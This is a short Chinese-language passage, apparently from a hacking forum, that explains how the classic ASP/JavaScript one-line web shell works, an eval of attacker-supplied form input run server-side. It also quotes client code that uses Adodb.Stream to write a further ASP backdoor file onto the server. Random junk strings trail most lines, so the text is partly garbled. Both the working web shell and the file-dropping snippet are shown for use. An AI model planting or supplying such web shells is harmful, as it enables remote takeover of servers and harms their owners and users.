就拿我们经常使用的冰狐大哥的一句话木马:<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>来解释下它的原理. ;*QN9T=0
首先<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行,后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了Request.form('#')+''这句代码,Request.form('#')的作用是读取客户端文件中html标记属性中name值被命名为#的部分,例如如下摘自一句话客户端的代码: /"MJkM.~E
<textarea name=# cols="80" rows="10"> 1S*P"8N}0h
set iP=server.createObject("Adodb.Stream") ~4 ^p}{
iP.Open @1.9PR$x
iP.Type=2 ]fC7%"nB
iP.CharSet="gb2312" IMaYEO[
iP.writetext request("aoyun") $8@+j[>
iP.SaveToFile server.mappath("aoyunwan.asp"),2 [&daG